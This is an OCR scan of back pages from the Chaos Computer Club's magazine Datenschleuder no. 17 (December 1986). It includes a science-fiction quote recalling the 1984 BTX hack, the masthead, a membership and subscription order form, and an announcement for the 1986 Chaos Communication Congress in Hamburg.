Sie können sich selbst kontrollieren. Sie erkennen jeden unbefug­ ten Eingriff.“ „So hat man es uns in den Schulen gelehrt“, über­ nahm Folly das Wort. „Wir Byte-Jäger wollen versu­ chen, das Gegenteil zu beweisen. Wir haben viele Vorbilder in der Vergangenheit. Eines davon stammt aus dem Dezember des Jahres 1984 der alten Zei­ trechnung. Da hat eine Gruppe junger Burschen aus einer terranischen Stadt namens Hamburg das da­ mals jüngst eingeführte BTX-System der Post gek­ nackt und ist in unzugängliche Bankdatenverbindun­ gen eingebrochen. Aus Jux haben diese Burschen dort eine halbe Milchstraße auf ihr Konto umge­ bucht.“ (aus: Peter Griese, „Positronicspiele“, in Perry Rho­ dan Jubiläumsband 6, Moewig Verlag 1985, ISBN 38118-7096-3) Computer-Telle ein Liebeszeichen! • Wenn die Frau den Mann mit Hobelbank, Computer-Zu­ satzteilen oder anderen Din­ gen fürs Hobby überrascht: Klarer Fall von Liebe! (74 Pro­ zent der deutschen Frauen sind nämlich eifersüchtig auf SEIN Steckenpferd. EINE TOLLE IDEE! UND wOhIN B i l d , H am burg , X - T ime 86 Tatwerkzeug Computer FAHREN WIR? Zum Chaos Comunication Congress! Chaos Communication Congress im Eidelstedter Bürgerhaus Elbgaustraße 12 lokstEdt IMPRESSUM Die Datenschleuder 17 Dezember 1986 Das Wissenschaftliche Fachblatt fuer Datenreisende D-2000 Hamburg 20 — Schwenckestrasse 85 Geonet: Geo1: Chaos-Team Btx : ****655321 # Eigendruck im Selbstverlag. Datenschleuder 14 C.L.I.N.C.H.: 040 632 3517 Herausgeber und ViSdPG: Herwart Holland-Moritz Mitarbeiter dieser Ausgabe (u.a.): R.Schrutzki, A.Eichler, P.Franck, H.Gruel, M.Kuehn., S.Stahl, CHW, e pi/2, C.Müller, T.Lange, Andy M.-M., S.Wernery, Poetronic Chaos Computer Club Bestellfetzen Hiermit bestelle ich folgende(s) an unerfüll- und (un)verpackbaren Sachen: ____ cccvw 20,00DM ____ .___ Einmalige Aufnahmegebühr ____ cccf1 _ cccn1 ____ cccs1 230,00DM 120,00DM 60,00DM ____ .___ ____ .___ ____ .___ mehr erwünscht... Förderndes Mitglied normales Mitglied (für 1 Jahr) Schüler, Studenten oder Ähnliches (1 Jahr) ____ ___ ____ ____ dspe dsf1 dsn1 dss1 2,50DM 100,00DM 60,00DM 30,00DM .___ ____ .___ ____ .___ ____ .___ Probeexemplar der Datenschleuder Förderabo der DS (mehr Geld erwünscht...) Standard-Jahresabo der DS Sozialabo der DS für Schüler oder Ähnliches ____ dsh1 35,00DM ____ .___ Die Hackerbibel (Teil 1) incl. Porto usw. ____ dsk10 3,33DM ____ .___ 10 Kleber "Kabelsalat ist gesund" ____ dsabh 3,33DM ____ .___ ____ pvt ???,??DM ____ .___ 64 Kleber "Achtung Abhörgefahr” (A4 Bogen spritzwassergeschützt) Porto, Trinkgeld usw. für den Rest... bei 2 Stellen (vor Komma) gehts schneller das Geld liegt bei als __ Scheck __ Briefmarken __ Bargeld Total ========= Nur für zukünftige Mitglieder: Ich zahle meine Mitgliedsbeiträge Vierteljährlich Halbjährlich Jährlich __ __ __ Zutreffendes bitte ankreuzen per Scheck __ Bar per Überweisung auf Postgiro Hmb 5990 90-201 Einzugsermächtigung Nur für zukünftige Mailbox-Benutzer: Ich möchte teilnehmen an der Zutreffendes bitte ankreuzen, Unterlagen werden zugeschickt. Infex Mailbox (20,00 DM Eintragungsgebühr + 8,00 DM/Monat Mindest­ nutzung + anfallende Nutzungsgebühren) C.L.I.N.C.H. Box (5,00 DM pro Monat ohne zusätzliche Zeitgebühren 2,00 DM pro Monat für Schüler u.ä.) Alle Abonnementpreise beziehen sich auf ca. 1 Jahr, d.h. 8 Ausgaben. Alle Mitgliedsbeiträge gelten ebenfalls für 1 Jahr. Mitglieder erhalten die Datenschleuder als Abonnement gratis. Spenden werden jederzeit dankend entgegengenommen!!! Adressfeld Vorname Ohne Adress- Hilfszeile aufkleber Straße mindestens Ort 1,00 DM Elektronische Adresse Trinkgeld Datum: Hier Unterschrift: Datenschleuder 15 Name datenschleuder Nr. 17 * Dezenber 1986 * Postvertriebsstück C9927F * Geb. bez. am 28. und 29. Dezember Wenn unzustellbar Anschriftenausschnitt bitte mit neuer Adresse zurück Chaos Connunication Congress '86 Eidelstedter Bürgerhaus ElbGAUstraße 12 2000 Hamburg 54 Congressbeginn: Sonntag, den 28.Dezember 1986, 09.00 Uhr DAS Treffen für Datenreisende! Teleton, DATEX, BTX, Telex, Online - Mailbox, Datenfunk, Videos, Klönschnack, und..und... Unsere Themen dieses Jahr unter anderem: Computerviren, Monitore abhören, Datenschutz, Datenfrust, Datenlust, Com­ puter im Bundestag, Quo vadis Müllbox u.v.v.v.v.a.... Und wie immer dabei: Chaos-Cafe, Chaos - Archiv, Hack­ center und natürlich der traditionelle Internationale Früh schoppen mit fünf Hackern aus sechs Ländern. Eintrittspreise: Mitglieder 15.-, private Teilnehmer 20.-, Presse 50.- und gewerbliche Teilnehmer 150.- Voranmeldung durch Überweisung auf Konto 59 90 90 - 201 beim PostGirosAmt Hamburg. Chaos Computer Club e.V. Schwenckestraße 85 2000 Hamburg 20 Telefon 040 / 490 37 57 BTX: 655322 Weitere Informationen laufend in der CLINCH- Mailbox Hamburg 0 4 0 / 632 35 17 und Datex-P 44 4000 90 314 Pas sfoto mitbringen I Datenschleuder 16